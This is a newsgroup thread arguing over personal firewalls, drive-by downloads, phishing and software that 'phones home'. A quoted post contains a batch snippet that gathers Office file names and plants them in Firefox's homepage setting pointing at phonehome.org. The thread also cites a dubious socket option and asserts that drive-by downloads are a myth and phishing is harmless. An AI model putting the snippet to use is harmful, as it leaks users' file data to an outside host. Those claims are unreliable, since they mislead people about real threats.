Jetico Personal Firewall freeware asks way to many questions

[Sebastian G.]

kurt wismer wrote:


>> AFAICS things are typically stated like "it just happens naturally".
>
> that could just as easily be an interpretation that is peculiar to you
> alone...


Sorry, but it's exactly what I see in real life.

> it is something that is likely to happen (or to have happened, as in
> 'thats the way the malware got in') to quite a few average users because
> it's not easy to avoid being vulnerable nor to avoid being exposed...


Nonsense, it is really easy because almost every webbrowser is secury by
default out-of-the-box.

>> Aside from the serious need for any actual vulnerability, which is
>> truely hard to find,
>
> hard to find a vulnerability? on what planet?


On this planet. Show me an up-to-date webbrowser with an unpatched
vulnerability and/or a bad security history (that is, there have been large
non-negative delays between vulnerability and patch and no workarounds).

> i'm wondering what exactly you mean by avoidability here... do you mean
> it should be easy to avoid being exposed?


It's hard getting exposed at all.

> you are aware that these types
> of exploits have been known to be injected into the ad rotation of
> legitimate, otherwise trustworthy sites, right?


Right. The exposure is measured by the security of the webbrowser, and
nothing else.

>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>> exploit" as we've called it since ever?
>
> well, consider the possibility that a web browser is not the only
> component on your system involved in rendering the content on a given
> web page... the browser renders the html, but what about scripts?


ECMAScript is obviously interpreted by the webbrowser as well.

> what about multimedia? what about other document formats like pdf?


That's external. Do you let such things load by default or what?

> strange, most people would refer to that simply as hype rather than full
> non-reality...


Indeed, since the phenomena don't belong to the description.

>> Just like "tracking cookies", "phone home" or "phishing".
>
> you don't think phishing is real either? oh boy...

Phishing is described as a problem of the webbrowser and/or the WWW, but
it's solely a PEBKAC problem, thus it's a problem within the user and the
phenomen only a result of this. For any minimally competent user phishing
purely is a non-threat.

[John Adams]

Sebastian G. wrote:

> If the application isn't malicious, then you don't need to enforce that
> it does what exactly it does. On the contrary, if you think that it does
> something that it shouldn't do, then you're already considering it as
> malicious.

No, maybe someone just doesn't want it to do things like phone home to
look for an update and it has no option to set it that way. Maybe they
want to block a game's adverver, some of them have that now, oh, they
could use the hosts file to do that too but you are also against that.
I bet you are a spyware programmer trying to mislead people to make your
job easier. Why else would you hang out in a boring firewall group day
after day?

[John Adams]

Sebastian G. wrote:

> You're kidding, right? I show a very very easy, highly portable and not
> specifically targeting way to phone home as you like:
>
> set x=
> for /r %i (*.doc *.xls *.ppt) do set x=%x%^;%i
> for /r %i in (prefs.js) do echo
> user_pref("browser.startup.homepage"^,"http://phonehome.org?%x%")^;>>"%i"

Well, if you are not a spyware programmer you are definitely a script kiddy.

[kurt wismer]

Sebastian G. wrote:
> kurt wismer wrote:
>
>>> AFAICS things are typically stated like "it just happens naturally".
>>
>> that could just as easily be an interpretation that is peculiar to you
>> alone...
>
> Sorry, but it's exactly what I see in real life.

here's the thing, it's *still* presented in a way that's open to
interpretation... your interpretation is that 'it just happens
naturally' on hardened systems while other possible interpretations
could easily include 'it just happens naturally' for most average users
(who, by the way, don't have hardened systems)...

>> it is something that is likely to happen (or to have happened, as in
>> 'thats the way the malware got in') to quite a few average users
>> because it's not easy to avoid being vulnerable nor to avoid being
>> exposed...
>
> Nonsense, it is really easy because almost every webbrowser is secury by
> default out-of-the-box.

now you're just being absurd....

>>> Aside from the serious need for any actual vulnerability, which is
>>> truely hard to find,
>>
>> hard to find a vulnerability? on what planet?
>
> On this planet. Show me an up-to-date webbrowser with an unpatched
> vulnerability and/or a bad security history (that is, there have been
> large non-negative delays between vulnerability and patch and no
> workarounds).

vulnerabilities exist in most non-trivial programs whether the good guys
know about them or not so i will say *all* web browsers have unpatched
vulnerabilities and time will bear me out...

and no, the bad guys don't depend on vulnerabilities already known to
the good guys... they have their own black hat researchers and their own
vulnerability black market...

>> i'm wondering what exactly you mean by avoidability here... do you
>> mean it should be easy to avoid being exposed?
>
> It's hard getting exposed at all.

no, it's not... it's quite easy because the exploits can be served
through mainstream sites like cnn.com...

>> you are aware that these types of exploits have been known to be
>> injected into the ad rotation of legitimate, otherwise trustworthy
>> sites, right?
>
> Right. The exposure is measured by the security of the webbrowser, and
> nothing else.

wrong... exposure has to do with whether you came in contact with it,
not whether you got compromised by it...

>>> BTW, what exactly differs a "drive-by-download" from a "webbrowser
>>> exploit" as we've called it since ever?
>>
>> well, consider the possibility that a web browser is not the only
>> component on your system involved in rendering the content on a given
>> web page... the browser renders the html, but what about scripts?
>
> ECMAScript is obviously interpreted by the webbrowser as well.

aside from the fact that that is not the only script language out there...

>> what about multimedia? what about other document formats like pdf?
>
> That's external. Do you let such things load by default or what?

of course it's external, that's the point... rendering web content
normally involves external functionality in addition to what's built
into the browser... even rendering images is 'external' (and has been a
source of problems - see wmf and vml)...

and yes, people let those things load/run by default... when they click
on a pdf link they expect to see the pdf in their browser.. when they
visit a flash site they expect the flash to just work automagically...

>> strange, most people would refer to that simply as hype rather than
>> full non-reality...
>
> Indeed, since the phenomena don't belong to the description.

it doesn't belong to the strawman you use as a description, no...

>>> Just like "tracking cookies", "phone home" or "phishing".
>>
>> you don't think phishing is real either? oh boy...
>
> Phishing is described as a problem of the webbrowser and/or the WWW, but
> it's solely a PEBKAC problem, thus it's a problem within the user and
> the phenomen only a result of this. For any minimally competent user
> phishing purely is a non-threat.

it seems dustin is correct, i'm wasting my time here... it's
unreasonable to expect users to know that paypalsecurity.com is
registered to a different entity than paypal.com is...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

[Sebastian G.]

John Adams wrote:

> Sebastian G. wrote:
>
>> If the application isn't malicious, then you don't need to enforce that
>> it does what exactly it does. On the contrary, if you think that it does
>> something that it shouldn't do, then you're already considering it as
>> malicious.
>
> No, maybe someone just doesn't want it to do things like phone home to
> look for an update and it has no option to set it that way.


Then you're considering it as malicious. (does something you don't want
without asking for permission)

> Maybe they want to block a game's adverver,


Then you're considering it as malicious. Aside from that, that typically
makes the software non-working and also typically violates the EULA.

> could use the hosts file to do that too but you are also against that.


Well, maybe because it doesn't work?
Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);

[Sebastian G.]

kurt wismer wrote:


> here's the thing, it's *still* presented in a way that's open to
> interpretation... your interpretation is that 'it just happens
> naturally' on hardened systems while other possible interpretations
> could easily include 'it just happens naturally' for most average users
> (who, by the way, don't have hardened systems)...


You don't need a hardened system to be secure against the typical threats of
connecting a machine to the internet. And on not especially hardened systems
it's still true that such things really don't need to happen naturally.

>> Nonsense, it is really easy because almost every webbrowser is secury by
>> default out-of-the-box.
>
> now you're just being absurd....


Or correct. Just take a look at the major players Mozilla Firefox, Mozilla
Seamonkey, Opera, Konqueror and w3m. Agreed, Mozilla Firefox is a bit
obscure, but neithertheless still secure by default.

> vulnerabilities exist in most non-trivial programs whether the good guys
> know about them or not so i will say *all* web browsers have unpatched
> vulnerabilities and time will bear me out...
>
> and no, the bad guys don't depend on vulnerabilities already known to
> the good guys... they have their own black hat researchers and their own
> vulnerability black market...


Thanks for stating the trivial exception that doesn't need to be discussed.
Now, can you present some incidents showing any significant relevance?

>> It's hard getting exposed at all.
>
> no, it's not... it's quite easy because the exploits can be served
> through mainstream sites like cnn.com...


Exposure is measures by the vulnerabilities, not by the websites serving
them. Who the hell cares if cnn.com serves some third-party scripts with
malicious intends as long as the intend can't materialize into an actual
compromise?

> wrong... exposure has to do with whether you came in contact with it,
> not whether you got compromised by it...


In that case, exposure should be about 100% and every system would be
compromised. Not. Without an unpatched vulnerability, that's a no-go.

>> ECMAScript is obviously interpreted by the webbrowser as well.
>
> aside from the fact that that is not the only script language out there...


Huh? It is, especially due to imply by the HTML standard. It's also that I
have yet to see a webbrowser supporting any additional scripting language.

>>> what about multimedia? what about other document formats like pdf?
>> That's external. Do you let such things load by default or what?
>
> of course it's external, that's the point... rendering web content
> normally involves external functionality in addition to what's built
> into the browser... even rendering images is 'external' (and has been a
> source of problems - see wmf and vml)...


External ! embedded. And which webbrowser renders WMF and VML?

> it seems dustin is correct, i'm wasting my time here... it's
> unreasonable to expect users to know that paypalsecurity.com is
> registered to a different entity than paypal.com is...

Sure it's reasonable, you just shouldn't expect people to be reasonable.
Heck, when you don't know the URL syntax, then you should expect to run into
security problems. Still it's the users fault, for intentionally ignoring
minimum required knowledge.

[John Adams]

Sebastian G. wrote:

> Well, maybe because it doesn't work?
> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);

<sigh> It works for game ad servers (it has been tested by me and many
other gamers) and any EULA that says you can't block ads wouldn't have a
legal leg to stand on. Just because an app phones home to check for
updates doesn't make it malicious but I may want to block it anyway just
because I can.

And you are wrong about drive by downloads (referring to another post of
yours). Maybe you need to bone up on the latest bots that are out there
in the wild.

[anonymous@remailer.hastio.org]

Sebastian G. wrote:

> kurt wismer wrote:
>
> > Sebastian G. wrote:
> > [snip]
> >> Aside from that, Drive-by-downloads are a well-known myth,
> >
> > that, i think, says it all...
>
> Seems like a sarcastic expression of doubt, but of course it's a myth.
> There's no general way that just by visiting a website malware could be
> installed. What's needed that this actually works is a vulnerable webbrowser
> or something that is abused as such, and the trivial solution to this
> problem is not using a vulnerable webbrowser, thus it's anything but
> unavoidable.

You're gibbering in circular semantics quibbles and trying to pass it
off as some sort of authoritative commentary. Your theories assume that
unbroken browsers exist at all, which they do not. The concept of
"Drive by downloading" is a reality simply because it can never be any
other way. Users will always want more and better content, and that
content will always have the potential to do harm because no such thing
as the perfect web browser can ever exist outside your fevered
imagination.

~~~~~~~~~~~~~~~~~~~~~
This message was posted via one or more anonymous remailing services.
The original sender is unknown. Any address shown in the From header
is unverified.

[Nomen Nescio]

Sebastian G. wrote:

> Dustin Cook wrote:
>
> > I can't even get the fellow to answer my questions regarding BugHunter,
> > despite the fact he spent a little time assuming what it does or doesn't
> > do and went from there.
>
>
> The reasons I didn't bother to answer your questions are two-fold:
>
> - You roughly tried to imply that I talked about something that I didn't
> test, which is something I'd never do.

You are a liar. Just in the past few days you tried to defend another
one of your assumptive pontifications with the immortal logic "well,
that's what other people are reporting".

It's pretty obvious from reading your posts, that you actually test
very little if anything that you blubber about. Your only skill, if it
can be called that, is wording things in such an ambiguous way that
there's nothing to really dissect. And then insisting it's right.

[Sebastian G.]

John Adams wrote:

> Sebastian G. wrote:
>
>> Well, maybe because it doesn't work?
>> Keyword: setsockopt(&socket, SOCKOPT_NO_HOSTS);
>
> <sigh> It works for game ad servers (it has been tested by me and many
> other gamers)


We're talking about malicious applications here.

> and any EULA that says you can't block ads wouldn't have a legal leg

> to stand on.

It has, fortunately for all the legitimate adware business.

> Just because an app phones home to check for

> updates doesn't make it malicious


We're not talking about updates. And indeed, if it was such an update
functionality that could not be disabled by means of configuration, it
should be considered as malicious.

> And you are wrong about drive by downloads (referring to another post of
> yours). Maybe you need to bone up on the latest bots that are out there
> in the wild.


Which are all due to PEBKAC, not hypothetical magic vulnerability fairies.